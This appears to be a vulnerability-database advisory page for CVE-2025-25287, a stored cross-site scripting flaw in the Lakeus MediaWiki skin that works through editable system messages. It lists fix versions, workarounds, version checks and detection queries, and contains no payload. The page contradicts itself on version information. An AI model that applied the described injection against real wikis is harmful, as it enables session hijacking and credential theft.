CVE-2025-25287
📋 TL;DR
Lakeus MediaWiki skin versions 1.0.8 through 1.3.0 are vulnerable to stored cross-site scripting (XSS) via malicious system messages. Users with editinterface privileges can inject raw HTML into system messages, potentially affecting all users depending on server configuration. This vulnerability requires administrative privileges to exploit but could lead to session hijacking or credential theft.
💻 Affected Systems
- Lakeus MediaWiki skin
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
An attacker with editinterface rights injects malicious JavaScript into system messages, leading to session hijacking, credential theft, or complete account compromise for all users accessing affected pages.
Likely Case
Privileged user accidentally or maliciously injects HTML/JavaScript into system messages, causing display issues or limited client-side attacks against users who view the affected messages.
If Mitigated
With proper privilege separation and input validation, impact is limited to users who explicitly enable themeDesigner.js in preferences, reducing attack surface significantly.
🎯 Exploit Status
Exploitation requires editinterface privileges, which are typically granted to administrators or trusted users. Attack involves editing system messages to inject raw HTML/JavaScript.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.3.1+REL1.39, 1.3.1+REL1.42, or 1.4.0
Vendor Advisory: https://github.com/lakejason0/mediawiki-skins-Lakeus/security/advisories/GHSA-mq77-3q68-v64v
Restart Required: No
Instructions:
1. Update Lakeus skin to version 1.3.1+REL1.39, 1.3.1+REL1.42, or 1.4.0. 2. For MediaWiki 1.39: update to 1.3.1+REL1.39. 3. For MediaWiki 1.42: update to 1.3.1+REL1.42. 4. For latest version: update to 1.4.0. 5. Clear MediaWiki cache after update.
🔧 Temporary Workarounds
Restrict editinterface privileges
allLimit editinterface rights to only essential administrators to reduce attack surface.
Disable themeDesigner.js
allPrevent users from enabling themeDesigner.js in preferences to limit impact.
🧯 If You Can't Patch
- Review and audit all users with editinterface privileges, removing unnecessary access.
- Implement Content Security Policy (CSP) headers to mitigate XSS impact.
🔍 How to Verify
Check if Vulnerable:
Check Lakeus skin version in MediaWiki skins directory or via MediaWiki Special:Version page.Check Version:
Check MediaWiki Special:Version page or examine skins/Lakeus/extension.json version field.Verify Fix Applied:
Verify version is 1.3.1+REL1.39, 1.3.1+REL1.42, or 1.4.0. Test system message editing to ensure HTML is properly sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual system message edits by users with editinterface rights
- Multiple rapid edits to lakeus-footermessage or themeDesigner.js messages
Network Indicators:
- Unexpected JavaScript execution on MediaWiki pages with Lakeus skin
SIEM Query:
source="mediawiki" AND (event="edit" AND target_message="lakeus-footermessage" OR target_message="themeDesigner.js")🔗 References
- https://github.com/lakejason0/mediawiki-skins-Lakeus/blob/82ad2cd341f85b814a6a0f37969e6210ebf2521d/includes/SkinLakeus.php#L27
- https://github.com/lakejason0/mediawiki-skins-Lakeus/blob/82ad2cd341f85b814a6a0f37969e6210ebf2521d/resources/themeDesigner.js
- https://github.com/lakejason0/mediawiki-skins-Lakeus/commit/fb79928f06efa47677fff27e0f4755eb32b1c8d9
- https://github.com/lakejason0/mediawiki-skins-Lakeus/security/advisories/GHSA-mq77-3q68-v64v
